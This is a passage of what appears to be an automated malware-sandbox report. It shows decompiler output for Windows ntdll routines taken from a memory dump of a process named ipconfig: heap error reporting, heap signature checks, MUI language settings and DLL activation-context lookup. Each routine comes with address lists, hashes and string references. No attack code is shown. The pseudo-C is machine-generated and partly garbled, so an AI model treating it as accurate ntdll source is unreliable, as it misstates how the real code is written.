              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 02F4B314
              • <unknown>, xrefs: 02F4B27E, 02F4B2D1, 02F4B350, 02F4B399, 02F4B417, 02F4B48E
              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 02F4B323
              • *** then kb to get the faulting stack, xrefs: 02F4B51C
              • The instruction at %p referenced memory at %p., xrefs: 02F4B432
              • write to, xrefs: 02F4B4A6
              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 02F4B305
              • *** enter .cxr %p for the context, xrefs: 02F4B50D
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
              • API String ID: 0-108210295
              • Opcode ID: 3403589e7d8678e2d89259dbb8d1ca7aa2df40df203832859f4451a362f96b50
              • Instruction ID: 94e88511ad64fe80ad40b76cb61bd4ab269121bff0220128777a5e515f3d3bed
              • Opcode Fuzzy Hash: 3403589e7d8678e2d89259dbb8d1ca7aa2df40df203832859f4451a362f96b50
              • Instruction Fuzzy Hash: B0812136E80214BBEB256E15CC45E7B3F26AF47BD9F808044F20D6B266DBA1C401DA72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F51C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
              Download Yara Rule
              C-Code - Quality: 44%
              			E02F51C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x2e748a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E02E9B150();
				} else {
					E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x2f8589c);
				E02E9B150("Heap error detected at %p (heap handle %p)\n",  *0x2f858a0);
				_t27 =  *0x2f85898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M02F51E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E02E9B150();
				} else {
					E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E02E9B150("Error code: %d - %s\n",  *0x2f85898);
				_t113 =  *0x2f858a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02E9B150();
					} else {
						E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E02E9B150("Parameter1: %p\n",  *0x2f858a4);
				}
				_t115 =  *0x2f858a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02E9B150();
					} else {
						E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E02E9B150("Parameter2: %p\n",  *0x2f858a8);
				}
				_t117 =  *0x2f858ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02E9B150();
					} else {
						E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E02E9B150("Parameter3: %p\n",  *0x2f858ac);
				}
				_t119 =  *0x2f858b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02E9B150();
					} else {
						E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x2f858b4);
					E02E9B150("Last known valid blocks: before - %p, after - %p\n",  *0x2f858b0);
				} else {
					_t120 =  *0x2f858b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E02E9B150();
				} else {
					E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E02E9B150("Stack trace available at %p\n", 0x2f858c0);
			}











              0x02f51c10
              0x02f51c16
              0x02f51c1e
              0x02f51c3d
              0x02f51c3e
              0x02f51c20
              0x02f51c35
              0x02f51c3a
              0x02f51c44
              0x02f51c55
              0x02f51c5a
              0x02f51c65
              0x02f51c67
              0x00000000
              0x02f51c6e
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02f51c67
              0x02f51cdc
              0x02f51ce5
              0x02f51d04
              0x02f51d05
              0x02f51ce7
              0x02f51cfc
              0x02f51d01
              0x02f51d0b
              0x02f51d17
              0x02f51d1f
              0x02f51d25
              0x02f51d30
              0x02f51d4f
              0x02f51d50
              0x02f51d32
              0x02f51d47
              0x02f51d4c
              0x02f51d61
              0x02f51d67
              0x02f51d68
              0x02f51d6e
              0x02f51d79
              0x02f51d98
              0x02f51d99
              0x02f51d7b
              0x02f51d90
              0x02f51d95
              0x02f51daa
              0x02f51db0
              0x02f51db1
              0x02f51db7
              0x02f51dc2
              0x02f51de1
              0x02f51de2
              0x02f51dc4
              0x02f51dd9
              0x02f51dde
              0x02f51df3
              0x02f51df9
              0x02f51dfa
              0x02f51e00
              0x02f51e0a
              0x02f51e13
              0x02f51e32
              0x02f51e33
              0x02f51e15
              0x02f51e2a
              0x02f51e2f
              0x02f51e39
              0x02f51e4a
              0x02f51e02
              0x02f51e02
              0x02f51e08
              0x00000000
              0x00000000
              0x02f51e08
              0x02f51e5b
              0x02f51e7a
              0x02f51e7b
              0x02f51e5d
              0x02f51e72
              0x02f51e77
              0x02f51e95

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
              • API String ID: 0-2897834094
              • Opcode ID: 823f8e310d3a4b0d5231c818523dd297c0fe07bf7d7ad1a3743c2816e205b6bc
              • Instruction ID: 102ff447e940c5ac06c62cdbaf38aac432c5ef90b4a00901ad2b3eaaad0e06be
              • Opcode Fuzzy Hash: 823f8e310d3a4b0d5231c818523dd297c0fe07bf7d7ad1a3743c2816e205b6bc
              • Instruction Fuzzy Hash: 4461E733AD1158DFD611AB85E849F37B3A5EB05AA470DD42FFB0E5B211C764A840CE1A
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EA3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E02EA3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E02EA1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E02EA1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E02EA1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E02EA1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E02EA1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L02EB4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E02EDF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E02EE1370(_t276, 0x2e74e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E02EDBB40(0,  &_v68, _t170);
									if(L02EA43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E02EDBB40(_t257,  &_v68, _t243);
								if(L02EA43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E02EE1370(_t278, 0x2e74e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L02EB4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E02EDF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E02EE1370(_v16, 0x2e74e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E02EDBB40(_t262,  &_v68, _t244);
								if(L02EA43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E02EE1370(_t282, 0x2e74e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E02EDBB40(_t262,  &_v68, _t201);
							if(L02EA43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L02EB4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E02EDF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E02EE1370(_t280, 0x2e74e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E02EDBB40(_t267,  &_v68, _t245);
							if(L02EA43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E02EE1370(_t284, 0x2e74e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E02EDBB40(_t267,  &_v68, _t224);
						if(L02EA43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































              0x02ea3d3c
              0x02ea3d42
              0x02ea3d44
              0x02ea3d46
              0x02ea3d49
              0x02ea3d4c
              0x02ea3d4f
              0x02ea3d52
              0x02ea3d55
              0x02ea3d58
              0x02ea3d5b
              0x02ea3d5f
              0x02ea3d61
              0x02ea3d66
              0x02ef8213
              0x02ef8218
              0x02ea4085
              0x02ea4088
              0x02ea408e
              0x02ea4094
              0x02ea409a
              0x02ea40a0
              0x02ea40a6
              0x02ea40a9
              0x02ea40af
              0x02ea40b6
              0x02ea40bd
              0x02ea40bd
              0x02ea3d83
              0x02ef821f
              0x02ef8229
              0x02ef8238
              0x02ef8238
              0x02ef823d
              0x02ef823d
              0x02ea3da0
              0x02ea3daf
              0x02ea3db5
              0x02ea3dba
              0x02ea3dba
              0x02ea3dd4
              0x02ea3e94
              0x02ea3eab
              0x02ea3f6d
              0x02ea3f84
              0x02ea406b
              0x02ea406b
              0x02ea406e
              0x02ea406e
              0x02ea4070
              0x02ea4074
              0x02ef8351
              0x02ef8351
              0x02ea407a
              0x02ea407f
              0x02ef835d
              0x02ef8370
              0x02ef8377
              0x02ef8379
              0x02ef837c
              0x02ef837c
              0x02ef835d
              0x00000000
              0x02ea407f
              0x02ea3f8a
              0x02ea3f8d
              0x02ea3f90
              0x02ea3f95
              0x02ef830d
              0x02ef830f
              0x02ea3f9b
              0x02ea3fac
              0x02ea3fae
              0x02ea3fb1
              0x02ea3fb1
              0x02ea3fb6
              0x02ef8317
              0x02ef831a
              0x00000000
              0x02ea3fbc
              0x02ea3fc1
              0x02ea3fc9
              0x02ea3fd7
              0x02ea3fda
              0x02ea3fdd
              0x02ea4021
              0x02ea4021
              0x02ea4029
              0x02ea4030
              0x02ea4044
              0x02ea4046
              0x02ea4046
              0x02ea4044
              0x02ea4049
              0x02ef8327
              0x02ef8334
              0x02ef8339
              0x02ef833c
              0x02ea404f
              0x02ea404f
              0x02ea404f
              0x02ea4051
              0x02ea4056
              0x02ea4063
              0x02ea4063
              0x02ea4068
              0x00000000
              0x02ea4068
              0x02ea3fdf
              0x02ea3fe2
              0x02ea3fe4
              0x02ea3fe7
              0x02ea3fef
              0x02ea4003
              0x02ea4005
              0x02ea4005
              0x02ea400c
              0x02ea4013
              0x02ea4016
              0x02ea4017
              0x02ea401b
              0x02ea401e
              0x00000000
              0x02ea401e
              0x02ea3fb6
              0x02ea3eb1
              0x02ea3eb4
              0x02ea3eb7
              0x02ea3ebc
              0x02ef82a9
              0x02ef82ab
              0x02ea3ec2
              0x02ea3ed3
              0x02ea3ed5
              0x02ea3ed8
              0x02ea3ed8
              0x02ea3edd
              0x02ef82b3
              0x02ef82b6
              0x00000000
              0x02ea3ee3
              0x02ea3ee8
              0x02ea3eed
              0x02ea3ef0
              0x02ea3ef3
              0x02ea3f02
              0x02ea3f05
              0x02ea3f08
              0x02ef82c0
              0x02ef82c3
              0x02ef82c5
              0x02ef82c8
              0x02ef82d0
              0x02ef82e4
              0x02ef82e6
              0x02ef82e6
              0x02ef82ed
              0x02ef82f4
              0x02ef82f7
              0x02ef82f8
              0x02ef82fc
              0x02ef82ff
              0x02ef82ff
              0x02ea3f0e
              0x02ea3f11
              0x02ea3f16
              0x02ea3f1d
              0x02ea3f31
              0x02ef8307
              0x02ef8307
              0x02ea3f31
              0x02ea3f39
              0x02ea3f48
              0x02ea3f4d
              0x02ea3f50
              0x02ea3f50
              0x02ea3f53
              0x02ea3f58
              0x02ea3f65
              0x02ea3f65
              0x02ea3f6a
              0x00000000
              0x02ea3f6a
              0x02ea3edd
              0x02ea3dda
              0x02ea3ddd
              0x02ea3de0
              0x02ea3de5
              0x02ef8245
              0x02ea3deb
              0x02ea3df7
              0x02ea3dfc
              0x02ea3dfe
              0x02ea3e01
              0x02ea3e01
              0x02ea3e06
              0x02ef824d
              0x02ef824f
              0x02ef8254
              0x00000000
              0x02ea3e0c
              0x02ea3e11
              0x02ea3e16
              0x02ea3e19
              0x02ea3e29
              0x02ea3e2c
              0x02ea3e2f
              0x02ef825c
              0x02ef825f
              0x02ef8261
              0x02ef8264
              0x02ef826c
              0x02ef8280
              0x02ef8282
              0x02ef8282
              0x02ef8289
              0x02ef8290
              0x02ef8293
              0x02ef8294
              0x02ef8298
              0x02ef829b
              0x02ef829b
              0x02ea3e35
              0x02ea3e38
              0x02ea3e3d
              0x02ea3e44
              0x02ea3e58
              0x02ef82a3
              0x02ef82a3
              0x02ea3e58
              0x02ea3e60
              0x02ea3e6f
              0x02ea3e74
              0x02ea3e77
              0x02ea3e77
              0x02ea3e7a
              0x02ea3e7f
              0x02ea3e8c
              0x02ea3e8c
              0x02ea3e91
              0x00000000
              0x02ea3e91

              Strings
              • WindowsExcludedProcs, xrefs: 02EA3D6F
              • Kernel-MUI-Language-Allowed, xrefs: 02EA3DC0
              • Kernel-MUI-Language-SKU, xrefs: 02EA3F70
              • Kernel-MUI-Number-Allowed, xrefs: 02EA3D8C
              • Kernel-MUI-Language-Disallowed, xrefs: 02EA3E97
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
              • API String ID: 0-258546922
              • Opcode ID: 6ffc033b15b0d47028036dd045dfd8c5a44bc36de4366bcfd2300d69cc4fdd65
              • Instruction ID: 5d45ea1f2940bd73d3ee83c0cc5aa64ea3c90d9bf37215acf07c6c9a39cfd62c
              • Opcode Fuzzy Hash: 6ffc033b15b0d47028036dd045dfd8c5a44bc36de4366bcfd2300d69cc4fdd65
              • Instruction Fuzzy Hash: BEF15E72D80618EFCB11DF98C990AEFBBB9FF48754F15906AE505AB250D770AE01CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E940E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
              Download Yara Rule
              C-Code - Quality: 29%
              			E02E940E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E02E9B150();
					} else {
						E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E02E9B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E02E9B150(", passed to %s", _t29);
					}
					_push("\n");
					E02E9B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x2f86378 = 1;
						asm("int3");
						 *0x2f86378 = 0;
					}
					return 0;
				}
				return 1;
			}





              0x02e940e6
              0x02e940e8
              0x02e940f1
              0x02ef042d
              0x02ef044c
              0x02ef0451
              0x02ef042f
              0x02ef0444
              0x02ef0449
              0x02ef045d
              0x02ef0466
              0x02ef046e
              0x02ef0474
              0x02ef0475
              0x02ef047a
              0x02ef048a
              0x02ef048c
              0x02ef0493
              0x02ef0494
              0x02ef0494
              0x00000000
              0x02ef049b
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
              • API String ID: 0-188067316
              • Opcode ID: ad86d30b0b9e326b68c367579c8b336d6ffedc1aab75457bb233816e91cea0b2
              • Instruction ID: f465a63f59a9d591f6b37caef5e4faa92ab2d156c67d7a51fdf863de86837b13
              • Opcode Fuzzy Hash: ad86d30b0b9e326b68c367579c8b336d6ffedc1aab75457bb233816e91cea0b2
              • Instruction Fuzzy Hash: 110128321C06409EF625D765E41DFABB7A8DB02F3CF18E06EF0094B652CBE49480C921
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC8E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
              Download Yara Rule
              C-Code - Quality: 44%
              			E02EC8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x2f8d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x2f88464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x2f85780 & 0x00000003) != 0) {
							E02F15510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x2f85780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E02EDB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x2f87984; // 0x402af0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x2f88464; // 0x75150110
					 *0x2f8b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E02EC9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x2f85780 & 0x00000005) != 0) {
						_push(_t49);
						E02F15510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















              0x02ec8e0f
              0x02ec8e16
              0x02ec8e19
              0x02ec8e1b
              0x02ec8e21
              0x02ec8e7f
              0x02ec8e85
              0x02f09354
              0x02f0936c
              0x02f09371
              0x02f0937b
              0x02f09381
              0x02f09381
              0x02f0937b
              0x02ec8e9d
              0x02ec8e9d
